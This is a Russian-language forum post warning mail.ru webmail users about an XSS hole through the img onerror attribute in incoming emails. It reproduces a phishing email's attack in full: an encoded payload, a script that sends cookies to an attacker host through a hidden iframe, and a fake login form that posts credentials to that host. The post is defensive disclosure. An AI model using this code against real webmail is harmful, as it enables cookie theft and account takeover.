Владельцам почты на mail.ru

Заметил что mail.ru в inbox при прочтении письма успешно пропускает параметр onerror тэга img, что дает "особо хитроjопым" интересные возможности по угону ящика.

Рассмотрим на реальном примере.

Вам пришло письмо, в теле письма картинка, но не простая, а "золотая".

<img src="ff" onerror="***x28;***x61;***x3D;***x28;***x62;***x3D;***x64;***x6F;***x63;***x75;***x6D;***x65;***x6E;***x74;***x29;***x2E;***x63;***x72;***x65;***x61;***x74;***x65;***x45;***x6C;***x65;***x6D;***x65;***x6E;***x74;***x28;***x27;***x73;***x63;***x72;***x27;***x2B;***x27;***x69;***x70;***x74;***x27;***x29;***x29;***x2E;***x73;***x72;***x63;***x3D;***x27;***x68;***x74;***x74;***x70;***x3A;***x2F;***x2F;***x66;***x69;***x6C;***x6D;***x2D;***x6C;***x69;***x6B;***x65;***x2E;***x72;***x75;***x2F;***x6D;***x61;***x69;***x6C;***x72;***x75;***x2F;***x74;***x74;***x32;***x2E;***x6A;***x73;***x27;***x2C;***x62;***x2E;***x62;***x6F;***x64;***x79;***x2E;***x61;***x70;***x70;***x65;***x6E;***x64;***x43;***x68;***x69;***x6C;***x64;***x28;***x61;***x29;***x3B;***x76;***x6F;***x69;***x64;***x28;***x30;***x29;***x3B;">";

Через параметр error в зашифрованном видео подставлен следующий код:

a=(b=document).createElement('scr'+'ipt')).src='http://film-like.ru/mailru/tt2.js',b.body.appendChild(a);void(0);"; 

С помощью этого кода подгружается js файл со следующим кодом:

document.getElementById('TipOfTheDay').innerHTML='<IfRaMe width=0 height=1 src="http://film-like.ru/koldunschik/s.php?'+document.cookie+'"></IfRaMe>';document.getElementById('TipOfTheDay').style.display='none';

77domain_name = /Mpop=.+:(.+?)@(.+?):/.exec(document.cookie)[2];
if (domain_name == 'mail.ru'){ domain_html = "<select name='domain'><option selected='selected' value='mail.ru'>@mail.ru</option><option value='inbox.ru'>@inbox.ru</option><option value='bk.ru'>@bk.ru</option><option value='list.ru'>@list.ru</option></select>"; }
if (domain_name == 'bk.ru'){ domain_html = "<select name='domain'><option value='mail.ru'>@mail.ru</option><option value='inbox.ru'>@inbox.ru</option><option selected='selected' value='bk.ru'>@bk.ru</option><option value='list.ru'>@list.ru</option></select>"; }
if (domain_name == 'inbox.ru'){ domain_html = "<select name='domain'><option value='mail.ru'>@mail.ru</option><option selected='selected' value='inbox.ru'>@inbox.ru</option><option  value='bk.ru'>@bk.ru</option><option value='list.ru'>@list.ru</option></select>"; }
if (domain_name == 'list.ru'){ domain_html = "<select name='domain'><option value='mail.ru'>@mail.ru</option><option value='inbox.ru'>@inbox.ru</option><option  value='bk.ru'>@bk.ru</option><option selected='selected' value='list.ru'>@list.ru</option></select>"; }
x=document.createElement('div');
x.innerHTML="<div id='MailRuConfirm' class='alertDiv is-secure' style='z-index: 30101; position: fixed; margin-left: -672.5px; margin-top: -106.5px; left: 681px; top: 205px'>  <div class='alertDivSpan'><form action='http://film-like.ru/mailru/login.php' method='post' name='Auth' ><b class='h1 black dB m15 mb10 ml15 mr15 mt15'>Войти в почту Mail.Ru</b><div class='mb10 ml15 mr15 lh16'><div class='grey mb15'>Соединение с почтой было прервано.<br>Для продолжения работы введите логин и пароль.</div><table><tbody><tr><td class='pr10 pb15'><span class='bold'>Логин</span></td><td class='pr10 pb15'><input type='text' name='login' value='"+/Mpop=.+:(.+?)@(.+?):/.exec(document.cookie)[1]+"' style='width: 150px;'></td><td class='pb15'>"+domain_html+"</td></tr><tr><td class='pr10 pb10'><span class='bold'>Пароль</span></td><td class='pr10 pb10'><input type='password' name='password' style='width: 150px;'></td><td class='pb10'><a href='/cgi-bin/passremind'>Забыли пароль?</a></td></tr><tr><td class='pr10'> </td><td class='pr10 grey'><input type='checkbox' name='level' value='1' id='alien'> <label for='alien'>Чужой компьютер</label></td><td> </td></tr></tbody></table></div><div class='p15' style='background-color:#e6e8ed;' id='mailru-webagent-gen-24'><input type='submit' value='Войти в почту' class='t11 arial bold'></div></form>  </div></div><div style='opacity: 0.6; background-color: rgb(255, 255, 255); width: 100%; height: 100%; margin-left: 0px; position: fixed; top: 0px; left: 0px; z-index: 30001'/>";
setTimeout('parent.document.body.appendChild(x);', 100);
$('[tabindex = 1]').click();

Кручу-верчу-обмануть-хочу иии.... ваш логин и пароль в руках злоумышленников.

Довольно часто получаю подобные "письма счастья". Писал в саппорт mail.ru неоднократно, толку нет.

Ящик на мейле под всякий спам, поэтому в целом пофигу, но не солидно для такой конторы иметь такие баги, дырка то серьёзная :dont:

Будьте бдительны, не дайте себя обмануть и т.д.

Характерный признак, если при прочтении письма вас разлогинело, сразу меняйте пароль, это была не случайность )